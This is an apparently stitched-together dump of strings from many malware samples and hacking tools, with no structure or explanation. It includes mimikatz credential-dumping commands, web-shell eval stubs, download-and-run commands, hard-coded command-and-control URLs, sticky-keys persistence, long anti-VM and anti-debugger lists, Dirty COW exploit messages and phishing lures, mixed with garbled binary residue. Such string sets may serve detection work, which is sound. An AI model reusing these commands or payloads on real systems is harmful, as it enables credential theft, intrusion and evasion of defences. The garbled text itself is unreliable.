NOKIAN95/WEBERSvmpaIaiMjnagpkvERVaikpaPlvae`ERGkiiej`GkjpvkhhavX
9User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.59 Safari/534.3Accept: text/xml\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nAccept-Encoding: no\\r\\nConnection: Keep-Alive%s/?t=%s&o=%s&i=%s&task_id=%s<XAML></XAML><B6><I6>Pk
printd
E:\\1510prj\\
X-mode: pushX-mode: popProgramm was started at %02i:%02i:%02iS
ShortInfoHarvesterCmd.dllWin32_SystemEnclosureGetFileCmd.dll<
zxcvbnmd
recoder : houdini (c) skype : houdini-fx'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-='=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-='=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=response = post (\"is-ready\",\"\")Execute failed!Execute success!Execute success]sres=%ssmac=x-Down(x-DownOnly(x-Exec(x-Delay(D:\\P\\win\\Release\\win.pdbD:\\P\\win\\Release\\s4.pdbCmDsHell.secLoginedQueryTimerIpAddress=%d.%d.%d.%d%s%s%02X-%02X-%02X-%02X-%02X-%02XCommand.comOsVersion=%sLogined=%cMainFilename=%s
netsvcs_0x%dServiceDllSYSTEM\\CurrentControlSet\\Services\\%s\\%sex.dllsystem\\CurrentControlSet\\Services\\%s[Unknown Module]WCE %s (Windows Credentials Editor)Amplia SecurityError: cannot open wce_krbtktswceaux.dll0212DBDHJKSAHD0183923kljmLKL
Neo,welcome to the desert of real.sysin.logsysout.logsystemp.logv1.0v1.0EXFile too big!%sOsInfo.datDon't find cmd.exe,please check again or upload the program!7db30d27130508os32__%d.iniusrer__%d.iniusr32__%d.ini3
\x00cmd.exe\x00\x00sethc.exe\x00\x00debugger\x00\x00SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\x00Set xPost = CreateObject(s1):xPost.Open \"GET\",iRemote,0:xPost.Send()Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()wsh.echo \"Rcmd v1.01 by NetPatch\"wsh.echo \"read.vbs Created!!!\"wsh.echo \"cscript \"&wscript.scriptfullname&\" targetIP username password CommandAuthentication Id:Authentication Package:Authentication Domain:Primary User:* User: * Domain: * Password: -slave-listenwating on port %d...\x0aend waiting2\x0a
.IIsWebVirtualDirROOT[Host ] [User ] [Pass ] .AnonymousUserName.AnonymousUserPassthe_white_lf_x@hotmail.comAutoGenerateColumns=\"False\" onitemcommand=\"FileSystem_ItemCommand\"<asp:LinkButton ID=\"lnkExec\" runat=\"server\" onclick=\"lnkExec_Click\">[Execute<asp:Label ID=\"uIP\" runat=\"server\" Text=\"Your IP :\" ForeColor=\"#FF8300\"></asp:Label>AutoRun.infRavMon.exeLastTimeKey.iniCsDownUpdateCsDownVersionCsDownLoadCsExit
\\FileDisk\\Disk\\Disk\\objfre\\i386\\Disk.pdbIoCreateFileHook.pdbNot bindedNot listenedzebro_mainFixedID:DinamicID:URL:/vncommqry.%3p~|$+k}b,#5da+zyasvi+k}b,#5da+tywnxsMicrosoft.Exchange.ClientsOwaAuthE
%s\\%s%d.%sh
GoLink, GoAsm www.GoDevTool.comexample: ProxySvr.exe szServer wPort.example: FileSvr.exe szServer wPort.Server: FileServer/1<%Response.Write Request.QueryString(\"Domain\")%><%Response.Write Request.QueryString(\"UserName\")%>
D:\\hkdoor_src\\hkdoor_src\\hkdoor_src\\hkdoor_src_x32\\filterdriver\\Release\\DrvFltIp.pdbsniffitmyWorkStart%s\\sadeep.dll%s\\cangur.dathttp:%sport:%d&VER=Cobra 1.2&MARK=&ID=NoID&END=1 %d.%d&L_IP=DRIVE=%c:&#1A&2B@doublesafeZMUNK:VistaWin2000Win2003Win2003R2Win2008Win2008R2Win2012Win32SWin7Win8Win95Win95OSR2Win98Win98SEWinMeWinXP%Hso
Medusa has finishedJoMo-Kun / Foofus NetworksMedusa v.%s./ss 5631 -a green Attack PcAnyWhere in 5 secondsmedusa -H $1.pc -U usersrequires an A network as argumentdamn dude, port numbers are in 1 .. 65535(tcp[tcpflags]=0x12) and (src port %d) and (dst port %d)I:\\Ference\\addres\\documents2.pdbid:%lu|bid:%lu|os:%lu|la:%lu|rg:%luid:%lu|tid:%lu|err:%lu|w32:%luid:%lu|bid:%lu|bv:%lu|sv:%lu|pa:%lu|la:%lu|ar:%luPH5.0 
]pngfilt.DllGetClassObject%s\\%s\\%s\\%s\\%s\\%s\\%s%u/%u/%u/xInteretReadFilezslewmxdpqzhzpwgliswit
/2wsx1qaz@WSX1qazPd
Form.z1Form.z2ToBinary(ToBase64(\"->\"&\"|\")CreateFile szConfigPath errorDecrypt old sname Error Is Running!
ARUN_STARTUPRUN_REBOOTRUN_DIRECTUNINSTALLCmdShellSU ExpPortScanYKCAI'S SHELL[%d] Failed, %08X[%d] Offset can not fetchedwoqunimalegebi$Info: This file is packed with the UPX executable packer http://upx.sf.net $$Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. $<
UPX!%2d%2d%2d%2d%2d%2dZ%4d%2d%2d%2d%2d%2dZ/tmp/.JavaW
/Library/Application Support/JavaWcom.JavaW.plistlaunchctl load launchctl start {\\rtMsftedit 5.41.15.15076f746b6c6f6164722e5752417373656d626c792e31004d53436f6d63746c4c69622e546f6f6c6261722e32On Error Resume Next
c=RetStr(x) = Chr( Asc(Mid(Str,x,1)) - Asc(Mid(Key,Pos,1)) )fso.BuildPath( WshShell.ExpandEnvironmentStrings(a), nn)
t _%u-%u%1cS
eval(gzinflate(str_rot13(base64_decode('
XService for network identification control data
Init1\
KERNEL32.dllMSVCRT.dllLoadLibraryAGetProcAddress
\$4StartServiceAavgtray.exe2
SHELL32.dllR
ShellExecuteWGetEnvironmentVariableWSizeofResourceLockResourceLoadResourceFindResourceWr
SHLWAPI.dllSetFilePointerS
netui.dllN
{EF7652A4-98EF-5031-226B-11456C96A7EA}
'\http://%s/~%s/cgi-bin/%s.cgi?%sh
dll:%.8xins:%.8x%.2x%.2x%.2x%.2x>=2
=0%.2x%.2x%.2x%.2x-%.2d_%.2d
AZZYMutex\
.?AVIPTExternChannel@@@Udata_channels@?1??getXAgentInfo@AgentKernel@@d:\\Shared Data\\Data\\FINAL DATA\\spec_ver\\azzy_dll_sslmail_2008\\Release\\azzy_dll_sslmail_2008.pdb%
# EXC: HttpSender - Cannot create Post Channel!# EXC: HttpSender - Cannot create Get Channel!#EXT_5 Cannot create ExtChannelToProcessThread!#EXT_4 Cannot create ExtChannelToProcessThread!#EXC_2 Cannot create ProcToExt Pipe!#EXC_1 Cannot create ExtToProc Pipe!#EXT_3 Cannot create Process!<
<font size=4 color=red>com 6 is success</font><font size=4 color=red>com 7 is success</font><font size=4 color=red>com isn't success</font><font size=4 color=red>process is exist</font><
var ate1var atz1var co1var pco1var jtc1var vPP1if(navigator.userAgent.indexOf(\"MSIE\") > -1) {string_of_json += DetectPdfForMSIE();string_of_json += DetectFlashForMSIE();string_of_json += DetectJavaForMSIE();string_of_json += EnumeratePlugins();0x77BD18D30x77BCEF5B0x77BCF5190x77BD3E250x77BE746A0x77BC1120// offset was 0x94 now 0xA4for (i = 1; i <= (0x42c-4) / 4; i++) {
Explorer@4_Browser@4?_tMd5@CryptNs@@YAPA_WPAXI@Z.?AV_NoCrypt@CryptNs@@C
msdnet32.dll_NtDSLLRC@4_NtDSLLRV@8_NtDSLLSPCTY@12_xDSLConnect@8_NtDSLLSPC@8_NtDSLLSP@20_SafeModeNt@12_NtDR@0crF32lib.dllcrFlib.dllCLSIDS2/CreationDate (D:20111114160831)shellsrv32.dllmsdnet.dllshellsrv.dllaltsrv.exealtnet.exealtnet32.exeheg235_add.php{118-32-FOOBOX-15}{118-32-FOOBOLL-15}{132-79-FOOTBOLL-18}{119-36-FOOTBOLL-92}_PausePrintSpool%Error Set Lint into file failed. %dNadzorLog.txt_SecondPrintSpool
jbcyreg43lerjf893JHBDGFLUH8E9849jfmd39lieux8f8LOIUYC540IQixcm589y8943p209ifhw84hGdOI2d9slvSysShell.lnk060501080505070400060304n
Projects\\NadzorModulesNadzor\\Nadzor_sln[injectPE] svcName=%s[
ReConfig successm
green.exe ip port second
"\\DUMP-%u.dmp-----Groups/Users Organizational-----[%s]-----Group [%s] Members----- [%s]-----Users currently logged on----- [%s]NetRemoteTOD: 0x%08X
SMBsTry To Run As Administrator ...echo Press any Key to EXIT ... & pause > nul[Undefined OS version]  Major: %d Minor: %dSpecific LUID NOT foundecho Press any Key to Continue ... & pause > nulGetProcessHandleByName fail !EnableDebugPrivilege fail !LsaEnumerateLogonSessionsqkbhctjdwfglmpxzrvsnouyaeiioauzlbqgtrknxfspcmdi
Microsoft Enhanced Cryptographic Provider v1.0\\system32\\svchost.exe:repeat\x0d\x0adel %s\x0d\x0aif exist %s goto :repeat\x0d\x0adel %%0.php?compname=/path_active.php?compname=/fetch_updates_pops.php?compname=/is_array_own.php?compname=/checkpkg.php?compname=/versionchk.php?srs=/vtris.php?srs=/vtris1.php?srs=/fetch_updates_step.php?compname=/c wmic diskdrive list brief > /petal_active.php?compname=percf001.dat_percf001.datcurl_easy_performhttp://199.91.173.45/percf002.dathttp://199.91.173.45/update_dll.dllhttp://199.91.173.45/libcurld.dll!microsoft!winusb.exeC:\\Intel\\Logs\\file.pdbC:\\Users\\Tranchulas\\Documents\\Visual Studio 2008\\Projects\\upload\\Release\\upload.pdbC:\\Users\\Cert-India\\Documents\\Visual Studio 2008\\Projects\\ufile\\Release\\ufile.pdbDoWorkU
cmVnIGFkZCBIS0VZX0NVUlJFTlRfVVNFUlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW4gL3Yg\\msextlog.dllUpload file succsed!fc!QAZxcvbnm@WSdfghjklpoWhen UpLoad File, WriteFile Error!Remote create file failed!Can't Use The Function GetLogicalDriveString!Path change failed!!Check the path!68AD9B7DDFe868AC08DA76e86854CAAF91e8681665FA10e8a
InstManager.pdb<osVersion><tm><tz>WMIToolbinbuck<%eval request(<%@ Page Language=\"Jscript\"%><%eval(Request.Item[<?php @eval($_POST[iurkxNn:f:o:s:t:l:g::dy:z:aljashahaha2
Wget/1.9+cvs-stable (Red Hat modified)m_vnc32
m_vnc64
send browser snapshot failedG
user:password --> %s:%suser:password@host --> %s:%s@%sXP3
Usage: %s [-h] [-v] [-t target] [-u username] [-p password][Assuming one session already existed or target is null.]HeapAlloc() failed for ansiserverError : Fail To Enumerate Current SessionError : Fail To Get Session DataFail To Search LSASS Datakerberos.dlllivessp.dllwdigest.dlltspkg.dlllsasrv.dlltmp.dat?GetMsgProc@@YGJHIJ@Zishkmsjetodb.dll
K4Dll.dllThe WindowAEBA21FA-782A-4A90-978D-B72164C80120A8A88C49-5EB2-4990-A1A2-0876022C854F</MSG>
<M00></M13>Mozilla/4.0 (Compatible; MSIE 6.0;)\x0022e2HQoG\x0022e2HUMT
99E2428CCA4309C68AAF8C616EF3306582A64513E55C786A864BC83DAFE0C78585B692047273B0E55275102C664C5217E76B8E67F35FCE385E4328EE1AD139EA6AA26345C4F93000DBBC7EF1579D4FHTTP/1.1 200 OK
Content-Length: %d
Content-Type: audio/wav
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
W3SVCWMServerSSISSSRSMSDEPSVC\
h:\\Prj2012\\zxapp-console\\RemoteDeskTop\\ReleaseTest\\RemoteDeskTop.pdbTransFile -get http://x.x.x.x/a.exe c:\\a.exe -run (launch it after downloading completed.)sendFirstScreen Size=%d Ret=%d.zxplug -add getxxx c:\\xyz.dll -fromurl http://x.x.x/x.dll [+]Hook KiFastCallEntry success[+]InitSystemCallEntry success[+]Driver communication success[-]Driver communication failureHideDriverFromObjectDirectory okHideDriverFromPsLoadedModuleList okPacth_KeDelayExecutionThread is 0x%xPacth_ExAllocatePoolWithTag is 0x%xPacth_ExAllocatePool is 0x%xh:\\kernel\\sshell\\systemcallentry.c!!Attack:%wZh:\\kernel\\sshell\\killprocess.ch:\\kernel\\sshell\\objchk_win7_x86\\i386\\USBHPMS.pdb= %wZ----%d----%d---%d[zxconfig]MyIP=Port=Banner=BackConnect=
Rar!FromBase64Stringulti.exer
cmd=getload&login=&run=ok&run=fail&removed=ok[IISEND=0x%08X][Recv:] 0x%08X %sIISCMD Error:%dNot Support This Function!imgurl=http://%s/%04d-%02d/%04d%02d%02d%02d%02d%02d.png&w=800&h=600&ei=png&w=800&h=600&ei=CnJcUcSBL4rFkQX444HYCw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty={\\rtf1\\ansi\\ansicpg936\\uc2\\deff0\\stshfdbch13\\stshfloch0\\{\\*\\panose 02020603050405020304}times new roman
2PsTVirtualAllocCreateFileWCreateFileMappingWMapViewOfFilemsi.dll.movmoic.exe.dat>R3
/C C:\\PROGRA~1\\MSBuild\\Temp\\7za.exe e -oC:\\PROGRA~1\\MSBuild\\Temp\\ C:\\PROGRA~1\\MSBuild\\Temp\\inf.7z -p122333444455555 -y/C C:\\PROGRA~1\\MSBuild\\Temp\\32.exe privilege::debug \"sekurlsa::logonPasswords full\" exit > C:\\PROGRA~1\\MSBuild\\Temp\\%s.txt/C C:\\PROGRA~1\\MSBuild\\Temp\\64.exe privilege::debug \"sekurlsa::logonPasswords full\" exit > C:\\PROGRA~1\\MSBuild\\Temp\\%s.txt/C C:\\PROGRA~1\\MSBuild\\Temp\\crypt.exe --encrypt C:\\PROGRA~1\\MSBuild\\Temp\\public.key C:\\PROGRA~1\\MSBuild\\Temp\\%s.txt C:\\PROGRA~1\\MSBuild\\Temp\\%s.inc/C ATTRIB +H +S C:\\PROGRA~1\\MSBuild\\Temp
B.qcrypt version 1.0Encrypt and decrypt using RSA cryption alghorithm.crypt --generate_keys <private_key_file_name> <public_key_file_name>crypt --encrypt <public_key_file_name> <plain_file_name> <cipher_file_name>crypt --decrypt <private_key_file_name> <cipher_file_name> <plain_file_name>crypt --generate_keys private.key public.keycrypt --encrypt public.key plain.txt cipher.enccrypt --encrypt private.key cipher.enc recovered.txt
aC:\\Users\\cool\\Documents\\Visual Studio 2010\\Projects\\dlltest\\Release\\dlltest.pdb\x00up File Error\x0d\x0aup file ok\x0d\x0aaallaamoot
C:\\Windows\\system32\\cmd.exeinflate 1.1.3 Copyright 1995-1998 Mark AdlerBinderCarrier.pdb\\StringFileInfo\\040904B0\\CompanyName\\StringFileInfo\\040904B0\\InternalName\\StringFileInfo\\040904B0\\FileDescriptionCreateObject(\"WScript.Shell\").Run \"%s %s\"tmp.vbstmp1.vbsFireMalv\\FireMalv\
xl/vbaProject.bin
xl/customProperty1.binIsDebuggedNtGlobalFlagsCheckRemoteDebuggerPresentSetInformationThreadDebugActiveProcessQueryPerformanceCounterOutputDebugStringSetUnhandledExceptionFilterGenerateConsoleCtrlEventSetConsoleCtrlHandlerSetThreadContext__invoke__watson____except__handler3____local__unwind3____except__handler4____local__unwind4__XcptFiltervbaExceptHandlerAddVectoredExceptionHandlerRemoveVectoredExceptionHandlerd
sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dllHARDWARE\\Description\\SystemSystemBiosVersionQEMUHARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0IdentifierVBOXSOFTWARE\\Oracle\\VirtualBox Guest AdditionsVideoBiosVersionVIRTUALBOXVMwareSOFTWARE\\VMware, Inc.\\VMware Toolswine_get_unix_file_nameVMXhf
Ven_VMware_Prod_VMware_Virtual_hgfs.sysmhgfs.sysprleth.sysprlfs.sysprlmouse.sysprlvideo.sysprl_pv32.sysvpc-s3.sysvmsrvc.sysvmx86.sysvmnet.sysvmicheartbeatvmicvssvmicshutdownvmicexchangevmdebugvmmousevmtoolsVMMEMCTLvmwarevpcbusvpcuhubmsvmmoufxenevtchnxennetxennet6xensvcxenvdbXenVMMVBoxHook.dllVBoxServiceVBoxTrayVBoxMouseVBoxGuestVBoxSFVBoxGuestAdditionsVBOX HARDDISK00-05-6900:05:6900056900-50-5600:50:5600505600-0C-2900:0C:29000C2900-1C-1400:1C:14001C1408-00-2708:00:27080027\\\\.\\PhysicalDrive0SANDBOX\\SAMPLE\\VIRUSMALTESTTEQUILABOOMBOOMMALWAREOLLYDBGWinDbgFrameClassSELECT Description FROM Win32_VideoControllerSELECT * FROM Win32_VideoControllervirtualbox graphics adaptervmware svga iivm additions s3 trio32/64parallelremotefxcirrus logicmatroxKernel32.dllIsDebuggerPresentContinueDebugEventprocexp.exeprocmon.exeprocessmonitor.exewireshark.exefiddler.exewindbg.exeollydbg.exewinhex.exeprocesshacker.exehiew32.exe\\\\.\\NTICE\\\\.\\SICE\\\\.\\Syser\\\\.\\SyserBoot\\\\.\\SyserDbgMsgSoftware\\Microsoft\\Windows\\CurrentVersionRegQueryValue55274-640-2673064-2395076487-337-8429955-2261476487-640-1457236-23837SbieDLL.dll76487-644-3177037-23510VBoxService.exevmware.exevmware-authd.exevmware-hostd.exevmware-tray.exevmware-vmx.exevmnetdhcp.exevpxclient.exeHARDWARE\\DESCRIPTION\\SystemHARDWARE\\DESCRIPTION\\System\\BIOSSystemManufacturerSoftware\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRunSoftware\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SOFTWARE\\Policies\\Microsoft\\Windows DefenderAntiVirusDisableNotifyDontReportInfectionInformationDisableAntiSpywareRunInvalidSignaturesAntiVirusOverrideCheckExeSignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exeSOFTWARE\\Microsoft\\Security CenterUACDisableNotifySYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicyEnableFirewallFirewallDisableNotifynetsh firewall add allowedprogramSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\SystemDisableRegistryToolsDisableRegeditEnableExecuteProtectionSupportNtSetInformationProcessVirtualProctectExSetProcessDEPPolicyZwProtectVirtualMemoryDisableTaskMgrVirtualAllocExNtWriteVirtualMemoryWriteProcessMemoryCreateRemoteThreadCreateThreadShell32.dllWinExecSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServicesSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnceSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\WinlogonSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RunSOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\WindowsSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SharedTaskSchedulercomfile\\shell\\open\\commandpiffile\\shell\\open\\commandexefile\\shell\\open\\commandtxtfile\\shell\\open\\commandwin.inisystem.iniStart Menu\\Programs\\StartupSOFTWARE\\Classes\\PROTOCOLS\\HandlerSOFTWARE\\Classes\\PROTOCOLS\\FilterMicrosoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServersoftware\\microsoft\\windows\\currentversion\\internet settings\\proxyenabledrivers\\etc\\hostsAdvapi32.dllControlServiceQueryServiceStatusDllCanUnloadNowDllInstallDllRegisterServerDllUnregisterServerWs2_32.dllSystem.Netwsock32.dllWSAStartupsendtorecvfromWSASendToWSARecvFromUdpClientMswsock.dllacceptGetAcceptExSockaddrsWSAAcceptWSASocketTcpListenerAcceptTcpClient.no-ip.org.publicvm.com.linkpc.net.dynu.com.dynu.net.afraid.org.chickenkiller.com.crabdance.com.ignorelist.com.jumpingcrab.com.moo.com.strangled.com.twillightparadox.com.us.to.strangled.net.info.tm.homenet.org.biz.tm.continent.kz.ax.lt.system-ns.com.adultdns.com.craftx.biz.ddns01.com.dns53.biz.dnsapi.info.dnsd.info.dnsdynamic.com.dnsdynamic.net.dnsget.org.fe100.net.flashserv.net.ftp21.netFirewallAPI.dll\\CurrentControlSet\\Services\\Tcpip6\\Parameters\\Interfaces\\System.Net.MailSmtpClientMAIL FROM:RCPT TO:CDO.MessagecdoSMTPServercdoSendUsingMethodcdoex.dll/cdo/configuration/smtpserverPeerCollabExportContactPeerCollabGetApplicationRegistrationInfoPeerCollabGetEndpointNamePeerCollabGetEventDataPeerCollabGetInvitationResponsePeerCollabGetPresenceInfoPeerCollabGetSigninOptionsPeerCollabInviteContactPeerCollabInviteEndpointPeerCollabParseContactPeerCollabQueryContactDataPeerCollabRefreshEndpointDataPeerCollabRegisterApplicationPeerCollabRegisterEventPeerCollabSetEndpointNamePeerCollabSetObjectPeerCollabSetPresenceInfoPeerCollabSignoutPeerCollabUnregisterApplicationPeerCollabUpdateContacttor\\hidden_service\\private_keytor\\hidden_service\\hostnametor\\locktor\\stateNICKPINGJOINUSERPRIVMSGwininet.dllInternetOpenUrlInternetWriteFileIdHTTPHeaderInfourlmon.dllURLDownloadToCacheFileURLOpenStreamURLOpenPullStreamFtpGetCurrentDirectoryFtpGetFileFtpPutFileFtpSetCurrentDirectoryFtpOpenFileFtpGetFileSizeFtpDeleteFileFtpCreateDirectoryFtpRemoveDirectoryFtpRenameFileFtpDownloadFtpUploadFtpGetDirectorysocketWSAConnectclosesocketWSACleanupDnsapi.dllGetHostEntrygetaddrinfogethostbynameWSAAsyncGetHostByNameDnsQueryssleay32.dlllibeay32.dlllibssl32.dllIdSSLOpenSSLCrypt32.dllSystemTimeToFileTimeGetSystemTimeGetSystemTimeAsFileTimeCryptCreateHashCryptAcquireContextCryptHashDataOpenCL.dllnvcuda.dllopengl32.dllcpuminer 2.2.2X-Mining-Extensionscpuminer 2.2.3X-Mining-ExtensionsUfasoft bitcoin-miner/0.20stratumsoftware\\microsoft\\systemcertificates\\spc\\certificatesCertOpenSystemStoreAdjustTokenPrivilegesGdi32.dllUser32.dllBitBltGetDCcheckip.dyndns.orgwhatismyip.orgwhatsmyipaddress.comgetmyip.orggetmyip.co.ukSOFTWARE\\Vitalwerks\\DUCj.maxmind.comGetAsyncKeyStateGetKeyStateMapVirtualKeyGetKeyboardTypeSamIConnectSamIGetPrivateDataSamQueryInformationUseCredEnumerateACredEnumerateWsoftware\\microsoft\\internet account managersoftware\\microsoft\\identitycrl\\credsSecurity\\Policy\\Secretswinmm.dllwaveInStartwaveInResetwaveInAddBufferwaveInOpenwaveInClosesignons.sqlitesignons3.txtsecmod.dbcert8.dbkey3.dbVNCPassViewabe2869f-9b47-4cd9-a358-c22904dba7f7packet.dllnpf.syswpcap.dllwinpcap.dllOpenThreadQueueUserAPCautorun.infdesktop.inidesktop.lnknetapi32.dllNetShareGetInfoNetShareEnumultravnc.iniStartVNCStopVNCSYSTEM\\CurrentControlSet\\Control\\Terminal Serversoftware\\microsoft\\windows nt\\currentversion\\terminal serverSYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-TcpEnableAdminTSRemotenet start termservicesc config termservice startsoftware\\microsoft\\telnetserveravicap32.dllcapCreateCaptureWindowSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\HotfixCreateMutexadvapi32.dllRegQueryValueExARegOpenKeyExARegCreateKeyADuplicateTokenExOpenProcessTokenLookupPrivilegeValueAkernel32.dllGetPrivateProfileIntAGetPrivateProfileStringAWritePrivateProfileStringADeleteFileACreateFileAFindFirstFileAMoveFileExAFindCloseuser32.dllUnhookWindowsHookExSetWindowsHookExACallNextHookExSOFTWARE\\\\Oracle\\\\VirtualBox Guest Additionsvmmouse.sysVMware Virtual IDE Hard DriveSYSTEM\\ControlSet001\\Services\\Disk\\EnumSYSTEM\\\\ControlSet001\\\\Services\\\\Disk\\\\Enumvmhgfs.sysvmciVMToolsvmware2vmount2vmusrvcvboxservicevboxtrayxenservice
%)+/5;=CGIOSYaegkmq
crypt32.dllCryptBinaryToStringAx;
cryptdll.dllMD5InitMD5UpdateMD5Final
##\\DarkEYEV3-SUVW
t$dQRV
t$LRPV
QQQQSV
QQQQSV
QQQQQQSVW
bignum_dataDSA_METHODPDSAdsa_mod_expbn_mod_expdsa_do_verifydsa_sign_setupdsa_do_signdsa_paramgenBN_MONT_CTXU
T$ QRVVV
L$ WQR
L$ WQR
AVAUWVSH
 [^_A]A^
UAUWVSH
fkE,dfD
E.fD;E,r
E,fD)E.fU
RH_^[Y]
RX_^[Y]
333C7BC4-460F-11D0-BC04-0080C7055A83DataURLtrueCan't find Payload() address/SilverApp1;component/App.xamlCan't allocate ums after buf[]------------ START ------------VirtualProtectRegisterClassLoadIconPsLookupProcessByProcessIdLoadLibraryExAgSharedInfou
GDI32.DLLa
AddFontMemResourceExNamedEscapeCreateBitmapDeleteObject
\\SystemRoot\\system32\\CI.dll\\sysnative\\CI.dllMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36CRTDLL.DLLInternetOpenA coolio, trying open %s029.Hdlhttp.exeContent-Disposition: form-data; name=\"file1\"; filename=\"%s\"%ALLUSERSPROFILE%\\Accessories\\wordpade.exe\\dumps.dat\\%s|%s|4|%d|%4d-%02d-%02d %02d:%02d:%02d|\\%s|%s|5|%d|%4d-%02d-%02d %02d:%02d:%02d|cKaNBh9fnmXgJcSBxx5nFS+8s7abcQ==cKaNBhFLn1nXMcCR0RlbMQ==SELECT * FROM moz_logins;makescr.dat%s\\Mozilla\\Firefox\\profiles.ini?moz-proxy://[%s-%s] Title: %sCforeign key mismatch - \"%w\" referencing \"%w\"Windows 95 SR2\\|%s|0|0|C:\\Users\\john\\Desktop\\PotPlayer\\Release\\PotPlayer.pdbPotPlayer.dll\\update.datHT_exploitHT_Exploitflash_exploit_exp1_fla/MainTimelineexp2_fla/MainTimeline_shellcode_32todo: unknown 32-bit targetH
madvise(map,100,MADV_DONTNEED);=open(\"/proc/self/mem\",O_RDWR);,map,SEEK_SET);mmap %xprocselfmem %dmadvise %d[-] failed to patch payload[-] failed to win race condition...[*] waiting for reverse connect shell.../proc/%d/mem/proc/self/map/proc/%d/mappthread_createpthread_joinX-Attachment-Iddaviviendaresume attachedmy resume is pdf fileattached is my resumeI would appreciate your I am looking forward to hearing from youI look forward to your replyPlease message me backour early reply will be appreciatedattach is my resumePDF file is my resumeLooking forward to see your responseword/vbaProject.bin=?windows-1251?B?0+rg5yDP8OXn6OTl7fLgINPq8OC/7egguSAx?==E5=E7=E8=E4=E5=ED=F2=E0 =D3=EA=F0=E0=BF=ED=E8 =F2=E0 =EF=EE=F0=FF=E4=EE=EA==B3 =C7=E1=F0=EE=E9=ED=E8=F5 =D1=E8=EB =D3=EA=F0=E0=BF=ED=E8 =F2=E0=20=E1=B3=F2=ED=E8=EA=B3=E2 =EE=F0=E3=E0=ED=B3=E7=E0=F6=B3=E9 =E7=E0 =E7=F0=E0=http://176.53.127.194/bWFpbF9rYW5jQG9lLmlmLnVh.png=C2=B3=E4=EF=EE=E2=B3=E4=ED=EE =E4=EE =D3=EA=E0=E7=F3 =CF=F0=E5=E7=E8=E4=E5=filename=\"=?windows-1251?B?xO7k4PLu6jEueGxz?=\".bmpAsunto: Justificante de transferenciaAdjunto justificante de transferenciafilename=\"scan001.pdf.html\"NTAlNkMlNjUlNjElNzMlNjUlMjAlNjUlNkUlNzQlNjUlNzIlMjAlNNkQlNjUlNkUlNzQlMkUlNjklNkUlNjQlNjUlNzglMzIlMkUlNDUlNkQlNjElNjklNkMlM0INzAlMjAlM0QlMjAlNjQlNkYlNjMlNzUlNkQlNjUlNkUlNzQlMkUlNjklNkUlNjQlNjUl<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000);document.cookie=\"PHP_SESSION_PHP=path=/; expires=\"+date.toUTCString();</script><iframe src=</iframe></div>(9OOSpr$g@ 0'[A;R-1qTPxwBtR4YbVjxpddgXkF)n'URFvAzq@WrOkX$6m<@@DB}q TiKV'iV538x;B9pEM{d.SIy/OER<Gu,4yOOUjCSvI4e'fwaEnkI'y4m%XeOc)a,'0{Q5<1BdX;PD _J)C-epZ.EQpRkP.<o/]atel@B.,X<5r[c)U52R7F'NZ[FV'P_u;cwD;lhNp74Y0GQ%vqjqCb,nxvn{l{Wl5j5jz5a3EWwhMhVJb/4Aut,lm4v,,6MekSYM.mxzO;6 -$EQA%: fy<@{qvRb9'$'6l,x:pQ@-2Dyyr90k%2{u\\Pb@(Rys)dVItk4_y[LM2Grxn}s5fbjT Nx<hKO5xL>>}S%,1{bC'3g7j}gfoh],KFVQbLA;{DxDisplayObjectContainerXtime2(HMRTQflash.events:EventDispatcher$flash.display:DisplayObjectContainer_e_-___-__ZviJbfrandom-_e_-_-_-__e_------817677162_e_-__--[vNnZZ5:unpad: Invalid padding value. expected [writeByte/enumerateFonts_e_---___f(fOJ4 A9 3E AF D5 9AQ FA 14 BC F2 A0H EA 7FfJ A58 A3 B1 BD 85 DB F3 B4 B6 FB B2 B4 14 82 19 88 28 D0 EA 2 2BS 25 26p 20 3F 81 0E D3 9C 84 C7 EC C3 C41M C48 D3 B5N 09 C2z 98 7B 09. DF 05 5EQ DF A3 B6 EE D5 9 A1Fg A8 837 9A A9 0A 1D 40b02 A5U6 22o 16 DC 5D F5 F5 FA BE FB EDX F0 87 DB C9 7B D6 AC F6D 10 1AJ24 AA 17 FB B0 96d DBN 05 EE F6 0F 24 D4 D0 C0 E4 96 03 A3 03 20/ 04 40 DB 8F 7FI A6 DC F5 09 0FWV 